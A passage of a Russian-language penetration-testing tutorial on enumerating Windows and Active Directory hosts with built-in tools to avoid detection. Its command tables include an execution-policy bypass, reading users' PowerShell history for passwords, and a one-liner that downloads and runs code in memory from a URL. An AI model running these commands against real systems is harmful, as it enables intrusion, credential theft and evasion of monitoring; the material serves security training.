Предположим, наш клиент попросил нас протестировать его внутреннюю среду на управляемом хостинге без доступа в Интернет, и все попытки загрузить на него инструменты потерпели неудачу. Наш клиент хочет посмотреть, какие типы перечислений возможны, поэтому нам придется прибегнуть к технике, которая предпологает тест за счет имеющегося и легитимного - то есть использовать только инструменты и команды, встроенные в Windows / Active Directory. Это также может быть более скрытным подходом и может не создавать такого количества записей в журналах и предупреждений, как подключение инструментов к сети в предыдущих разделах. В настоящее время большинство корпоративных сред имеют ту или иную форму сетевого мониторинга и ведения журнала, включая IDS / IP, брандмауэры, пассивные датчики и инструменты поверх средств защиты на базе хоста, таких как Windows Defender или Enterprise EDR. В зависимости от среды у них также могут быть инструменты, которые измеряют базовый уровень "нормального" сетевого трафика и ищут аномалии. Из-за этого наши шансы попасться возрастают в геометрической прогрессии, когда мы начинаем внедрять инструменты в окружающую среду извне.
Сначала мы рассмотрим несколько основных команд среды, которые можно использовать, чтобы получить больше информации о хосте, на котором мы находимся.
| Команда | Результат |
|---|---|
hostname |
Выводит имя компьютера |
[System.Environment]::OSVersion.Version |
Выводит версию операционной системы и уровень ревизии |
wmic qfe get Caption,Description,HotFixID,InstalledOn |
Печатает исправления, примененные к хостингу |
ipconfig /all |
Распечатывает состояние сетевого адаптера и его конфигурации |
set |
Отображает список переменных среды для текущего сеанса (запускается из командной строки) |
echo %USERDOMAIN% |
Отображает доменное имя, к которому принадлежит хост (запускается из командной строки) |
echo %logonserver% |
Выводит имя контроллера домена, с помощью которого выполняется регистрация хоста (выполняется из командной строки) |
Приведенные выше команды дадут нам краткое начальное представление о состоянии хоста, а также некоторую базовую информацию о сети и домене. Мы можем охватить приведенную выше информацию одной командой systeminfo.
Команда systeminfo, как показано выше, выведет для нас сводку информации о хосте в одном аккуратном выводе. Выполнение одной команды сгенерирует меньше логов, что означает меньшую вероятность того, что защитник заметит нас на хостинге.
PowerShell существует с 2006 года и предоставляет системным администраторам Windows обширную платформу для администрирования всех аспектов систем Windows и сред AD. Это мощный скриптовый язык, который можно использовать для глубокого изучения систем. В PowerShell есть множество встроенных функций и модулей, которые мы можем использовать при выполнении задания для восстановления хоста и сети, а также отправки и получения файлов.
Давайте рассмотрим несколько способов, которыми PowerShell может нам помочь.
| Cmd-Let | Описание |
|---|---|
Get-Module |
Список доступных модулей, загруженных для использования. |
Get-ExecutionPolicy -List |
Выведет настройки политики выполнения для каждой области на хосте. |
Set-ExecutionPolicy Bypass -Scope Process |
Это изменит политику для нашего текущего процесса с помощью параметра -Scope. Это приведет к отмене политики, как только мы освободим процесс или завершим его. Это идеальный вариант, потому что мы не будем вносить постоянные изменения в хост-жертву. |
Get-Content C:\\Users\\<USERNAME>\\AppData\\Roaming\\Microsoft\\Windows\\Powershell\\PSReadline\\ConsoleHost_history.txt |
С помощью этой строки мы можем получить историю PowerShell указанного пользователя. Это может быть весьма полезно, поскольку история команд может содержать пароли или указывать нам на файлы конфигурации или скрипты, содержащие пароли. |
| `Get-ChildItem Env: | ft Key,Value` |
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>" |
Это быстрый и простой способ загрузить файл из Интернета с помощью PowerShell и вызвать его из памяти. |
Давайте посмотрим на них в действии прямо сейчас на MS01 хостинге.